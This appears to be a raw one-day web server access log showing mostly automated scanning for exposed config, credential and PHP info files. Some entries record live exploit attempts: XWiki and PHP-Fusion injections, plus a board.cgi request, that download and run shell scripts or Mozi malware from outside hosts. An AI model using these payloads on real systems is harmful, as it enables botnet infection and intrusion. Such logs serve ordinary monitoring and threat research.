176.65.148.250 - - [21/Nov/2025:00:00:29 +0100] "-" 400 1930 176.65.148.250 - - [21/Nov/2025:00:00:29 +0100] "GET /index.htm HTTP/1.1" 404 727 176.65.148.250 - - [21/Nov/2025:00:00:29 +0100] "GET / HTTP/1.1" 200 1895 176.65.148.250 - - [21/Nov/2025:00:00:29 +0100] "-" 400 1930 176.65.148.250 - - [21/Nov/2025:00:00:29 +0100] "-" 400 1930 45.156.87.24 - - [21/Nov/2025:00:28:04 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [21/Nov/2025:00:30:37 +0100] "GET / HTTP/1.1" 200 1895 34.224.29.202 - - [21/Nov/2025:00:41:04 +0100] "GET / HTTP/1.1" 200 1895 176.65.150.72 - - [21/Nov/2025:01:03:30 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.38.44.221 - - [21/Nov/2025:01:37:28 +0100] "GET /login HTTP/1.1" 404 723 83.142.209.224 - - [21/Nov/2025:02:52:23 +0100] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [21/Nov/2025:03:09:51 +0100] "GET /login HTTP/1.1" 404 723 147.185.132.64 - - [21/Nov/2025:03:12:44 +0100] "GET / HTTP/1.0" 200 1895 107.170.62.197 - - [21/Nov/2025:03:54:29 +0100] "-" 400 1930 107.170.62.197 - - [21/Nov/2025:03:54:30 +0100] "-" 400 1930 107.170.62.197 - - [21/Nov/2025:03:54:30 +0100] "GET / HTTP/1.1" 200 1895 107.170.62.197 - - [21/Nov/2025:03:54:30 +0100] "GET /download/powershell/ HTTP/1.1" 404 746 107.170.62.197 - - [21/Nov/2025:03:54:30 +0100] "GET /get.php HTTP/1.1" 404 725 87.121.84.77 - - [21/Nov/2025:04:04:45 +0100] "GET /login HTTP/1.1" 404 723 193.142.147.209 - - [21/Nov/2025:04:12:12 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 176.65.150.72 - - [21/Nov/2025:04:20:17 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.251.78.46 - - [21/Nov/2025:05:32:46 +0100] "GET /phpinfo HTTP/1.1" 404 725 87.251.78.46 - - [21/Nov/2025:05:32:47 +0100] "GET /phpinfo.php HTTP/1.1" 404 729 87.251.78.46 - - [21/Nov/2025:05:32:47 +0100] "GET /test.php HTTP/1.1" 404 726 87.251.78.46 - - [21/Nov/2025:05:32:48 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 739 87.251.78.46 - - [21/Nov/2025:05:32:48 +0100] "GET /info.php HTTP/1.1" 404 726 87.251.78.46 - - [21/Nov/2025:05:32:49 +0100] "GET /php.php HTTP/1.1" 404 725 87.251.78.46 - - [21/Nov/2025:05:32:49 +0100] "GET /php_info.php HTTP/1.1" 404 730 87.251.78.46 - - [21/Nov/2025:05:32:50 +0100] "GET /i.php HTTP/1.1" 404 723 87.251.78.46 - - [21/Nov/2025:05:32:50 +0100] "GET /pi.php HTTP/1.1" 404 724 87.251.78.46 - - [21/Nov/2025:05:32:51 +0100] "GET /config.phpinfo HTTP/1.1" 404 732 87.251.78.46 - - [21/Nov/2025:05:32:51 +0100] "GET /admin/phpinfo.php HTTP/1.1" 404 739 87.251.78.46 - - [21/Nov/2025:05:32:51 +0100] "GET /.aws/credentials HTTP/1.1" 404 738 87.251.78.46 - - [21/Nov/2025:05:32:52 +0100] "GET /pinfo.php HTTP/1.1" 404 727 87.251.78.46 - - [21/Nov/2025:05:32:53 +0100] "GET /phpinfo2.php HTTP/1.1" 404 730 87.251.78.46 - - [21/Nov/2025:05:32:54 +0100] "GET /php_version.php HTTP/1.1" 404 733 87.251.78.46 - - [21/Nov/2025:05:32:55 +0100] "GET /version.php HTTP/1.1" 404 729 87.251.78.46 - - [21/Nov/2025:05:32:55 +0100] "GET /server-info.php HTTP/1.1" 404 733 87.251.78.46 - - [21/Nov/2025:05:32:55 +0100] "GET /env.php HTTP/1.1" 404 725 87.251.78.46 - - [21/Nov/2025:05:32:56 +0100] "GET /init.php HTTP/1.1" 404 726 45.38.44.221 - - [21/Nov/2025:05:37:01 +0100] "GET /login HTTP/1.1" 404 723 193.142.147.209 - - [21/Nov/2025:05:42:46 +0100] "GET / HTTP/1.1" 200 1895 213.209.143.49 - - [21/Nov/2025:06:08:40 +0100] "GET / HTTP/1.0" 200 1895 143.198.55.114 - - [21/Nov/2025:06:39:22 +0100] "GET /.env HTTP/1.1" 404 722 143.198.55.114 - - [21/Nov/2025:06:39:22 +0100] "GET /.git/config HTTP/1.1" 404 733 192.159.99.95 - - [21/Nov/2025:06:58:27 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [21/Nov/2025:06:58:27 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [21/Nov/2025:06:58:27 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [21/Nov/2025:06:58:27 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [21/Nov/2025:06:58:27 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [21/Nov/2025:06:58:27 +0100] "GET /infusions/downloads/downloads.php?cat_id=$%7Bsystem(wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh)%7D HTTP/1.1" 404 759 198.235.24.57 - - [21/Nov/2025:07:00:46 +0100] "-" 400 1930 198.235.24.57 - - [21/Nov/2025:07:00:46 +0100] "-" 400 1930 193.142.147.209 - - [21/Nov/2025:07:09:33 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 216.218.206.67 - - [21/Nov/2025:07:19:50 +0100] "GET / HTTP/1.1" 200 1895 216.218.206.75 - - [21/Nov/2025:07:20:32 +0100] "GET /favicon.ico HTTP/1.1" 404 729 216.218.206.123 - - [21/Nov/2025:07:20:44 +0100] "GET /?format=json HTTP/1.1" 200 1895 216.218.206.75 - - [21/Nov/2025:07:20:50 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 216.218.206.67 - - [21/Nov/2025:07:21:02 +0100] "GET /geoserver/web/ HTTP/1.1" 404 740 82.162.120.23 - - [21/Nov/2025:07:53:00 +0100] "GET /c/ HTTP/1.1" 404 724 82.162.120.23 - - [21/Nov/2025:08:08:01 +0100] "GET /c/ HTTP/1.1" 404 724 193.142.147.209 - - [21/Nov/2025:08:41:50 +0100] "GET / HTTP/1.1" 200 1895 83.142.209.135 - - [21/Nov/2025:09:03:46 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 36.64.14.250 - - [21/Nov/2025:09:15:47 +0100] "GET / HTTP/1.1" 200 1895 83.142.209.224 - - [21/Nov/2025:09:36:22 +0100] "GET / HTTP/1.1" 200 1895 44.220.185.220 - - [21/Nov/2025:09:48:15 +0100] "GET / HTTP/1.1" 200 1895 176.65.150.72 - - [21/Nov/2025:09:54:15 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 83.142.209.224 - - [21/Nov/2025:10:09:54 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [21/Nov/2025:10:26:11 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 176.65.134.34 - - [21/Nov/2025:10:30:26 +0100] "CONNECT example.com:443 HTTP/1.1" 400 804 193.142.147.209 - - [21/Nov/2025:11:39:38 +0100] "GET / HTTP/1.1" 200 1895 18.97.26.90 - - [21/Nov/2025:11:47:17 +0100] "GET / HTTP/1.1" 200 1895 206.168.34.39 - - [21/Nov/2025:12:51:47 +0100] "GET / HTTP/1.1" 200 1895 206.168.34.39 - - [21/Nov/2025:12:51:54 +0100] "-" 400 1930 206.168.34.39 - - [21/Nov/2025:12:51:58 +0100] "GET / HTTP/1.1" 200 1895 206.168.34.39 - - [21/Nov/2025:12:52:00 +0100] "GET /favicon.ico HTTP/1.1" 404 729 206.168.34.39 - - [21/Nov/2025:12:52:12 +0100] "-" 400 1930 206.168.34.39 - - [21/Nov/2025:12:52:19 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 746 83.142.209.135 - - [21/Nov/2025:13:24:03 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 83.142.209.224 - - [21/Nov/2025:13:30:53 +0100] "GET / HTTP/1.1" 200 1895 176.65.150.72 - - [21/Nov/2025:13:48:55 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 193.142.147.209 - - [21/Nov/2025:13:52:20 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 45.135.193.9 - - [21/Nov/2025:14:02:30 +0100] "GET /json/ HTTP/1.1" 404 727 193.142.147.209 - - [21/Nov/2025:15:04:21 +0100] "GET / HTTP/1.1" 200 1895 83.142.209.224 - - [21/Nov/2025:15:17:38 +0100] "GET / HTTP/1.1" 200 1895 85.11.182.3 - - [21/Nov/2025:15:32:20 +0100] "-" 400 1930 85.11.182.3 - - [21/Nov/2025:15:32:20 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [21/Nov/2025:15:56:14 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [21/Nov/2025:15:56:14 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [21/Nov/2025:15:56:14 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [21/Nov/2025:15:56:14 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [21/Nov/2025:15:56:14 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [21/Nov/2025:15:56:14 +0100] "GET /infusions/downloads/downloads.php?cat_id=$%7Bsystem(wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh)%7D HTTP/1.1" 404 759 130.211.53.197 - - [21/Nov/2025:15:56:16 +0100] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [21/Nov/2025:16:02:08 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 3.137.73.221 - - [21/Nov/2025:16:18:57 +0100] "GET / HTTP/1.1" 200 1895 3.137.73.221 - - [21/Nov/2025:16:20:45 +0100] "GET / HTTP/1.1" 200 1895 3.137.73.221 - - [21/Nov/2025:16:22:47 +0100] "-" 400 1930 3.137.73.221 - - [21/Nov/2025:16:24:15 +0100] "-" 400 1930 3.137.73.221 - - [21/Nov/2025:16:26:55 +0100] "-" 400 1930 176.65.150.72 - - [21/Nov/2025:16:59:38 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.38.44.221 - - [21/Nov/2025:17:53:16 +0100] "GET /login HTTP/1.1" 404 723 5.187.35.21 - - [21/Nov/2025:17:58:08 +0100] "GET / HTTP/1.1" 200 1895 45.135.193.9 - - [21/Nov/2025:18:00:17 +0100] "GET /json/ HTTP/1.1" 404 727 176.65.148.16 - - [21/Nov/2025:18:09:35 +0100] "GET /index.htm HTTP/1.1" 404 727 167.71.133.68 - - [21/Nov/2025:18:35:05 +0100] "GET /aaa9 HTTP/1.1" 404 722 167.71.133.68 - - [21/Nov/2025:18:35:08 +0100] "GET /aab8 HTTP/1.1" 404 722 167.71.133.68 - - [21/Nov/2025:18:35:12 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [21/Nov/2025:18:53:23 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [21/Nov/2025:18:53:24 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [21/Nov/2025:18:53:24 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [21/Nov/2025:18:53:24 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [21/Nov/2025:18:53:24 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [21/Nov/2025:18:53:24 +0100] "GET /infusions/downloads/downloads.php?cat_id=$%7Bsystem(wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh)%7D HTTP/1.1" 404 759 167.94.146.59 - - [21/Nov/2025:18:55:47 +0100] "GET / HTTP/1.1" 200 1895 167.94.146.59 - - [21/Nov/2025:18:55:50 +0100] "-" 400 1930 167.94.146.59 - - [21/Nov/2025:18:55:50 +0100] "GET / HTTP/1.1" 200 1895 167.94.146.59 - - [21/Nov/2025:18:55:50 +0100] "GET /favicon.ico HTTP/1.1" 404 729 167.94.146.59 - - [21/Nov/2025:18:55:53 +0100] "-" 400 1930 167.94.146.59 - - [21/Nov/2025:18:55:53 +0100] "GET /login HTTP/1.1" 404 723 117.209.240.232 - - [21/Nov/2025:19:18:14 +0100] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 749 193.142.147.209 - - [21/Nov/2025:19:18:30 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 45.38.44.221 - - [21/Nov/2025:19:32:33 +0100] "GET /login HTTP/1.1" 404 723 135.237.126.103 - - [21/Nov/2025:19:39:47 +0100] "GET /actuator/health HTTP/1.1" 404 737 77.45.77.84 - - [21/Nov/2025:19:42:20 +0100] "GET / HTTP/1.1" 200 1895 79.164.44.254 - - [21/Nov/2025:19:53:43 +0100] "-" 400 1930 79.164.44.254 - - [21/Nov/2025:19:53:43 +0100] "-" 400 1930 193.142.147.209 - - [21/Nov/2025:20:13:45 +0100] "GET / HTTP/1.1" 200 1895 199.45.154.145 - - [21/Nov/2025:20:17:45 +0100] "-" 400 1930 199.45.154.145 - - [21/Nov/2025:20:17:53 +0100] "-" 400 1930 199.45.154.145 - - [21/Nov/2025:20:17:54 +0100] "-" 400 1930 205.210.31.73 - - [21/Nov/2025:20:33:55 +0100] "GET / HTTP/1.0" 200 1895 176.65.148.16 - - [21/Nov/2025:20:36:49 +0100] "GET /index.htm HTTP/1.1" 404 727 205.210.31.207 - - [21/Nov/2025:20:56:20 +0100] "GET / HTTP/1.1" 200 1895 5.187.35.21 - - [21/Nov/2025:21:11:24 +0100] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [21/Nov/2025:21:12:32 +0100] "GET /login HTTP/1.1" 404 723 176.65.150.72 - - [21/Nov/2025:21:37:56 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 117.193.131.112 - - [21/Nov/2025:21:54:40 +0100] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.193.131.112:38576/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 727 176.65.150.72 - - [21/Nov/2025:22:15:10 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 193.142.147.209 - - [21/Nov/2025:22:24:15 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 45.142.193.88 - - [21/Nov/2025:22:31:37 +0100] "-" 400 1930 45.142.193.88 - - [21/Nov/2025:22:31:42 +0100] "-" 400 1930 45.142.193.88 - - [21/Nov/2025:22:31:47 +0100] "-" 400 1930 45.142.193.88 - - [21/Nov/2025:22:31:52 +0100] "-" 400 1930 45.142.193.88 - - [21/Nov/2025:22:31:57 +0100] "-" 400 1930 66.132.153.55 - - [21/Nov/2025:22:45:06 +0100] "GET / HTTP/1.1" 200 1895 66.132.153.55 - - [21/Nov/2025:22:45:09 +0100] "-" 400 1930 66.132.153.55 - - [21/Nov/2025:22:45:09 +0100] "GET / HTTP/1.1" 200 1895 66.132.153.55 - - [21/Nov/2025:22:45:09 +0100] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.55 - - [21/Nov/2025:22:45:13 +0100] "-" 400 1930 66.132.153.55 - - [21/Nov/2025:22:45:13 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 20.40.216.117 - - [21/Nov/2025:22:59:15 +0100] "GET / HTTP/1.1" 200 1895 20.40.216.117 - - [21/Nov/2025:22:59:16 +0100] "-" 400 1930 87.120.191.124 - - [21/Nov/2025:23:27:22 +0100] "-" 400 1930 45.38.44.221 - - [21/Nov/2025:23:35:03 +0100] "GET /login HTTP/1.1" 404 723 193.142.147.209 - - [21/Nov/2025:23:51:38 +0100] "GET / HTTP/1.1" 200 1895 204.76.203.18 - - [21/Nov/2025:23:58:13 +0100] "GET / HTTP/1.1" 200 1895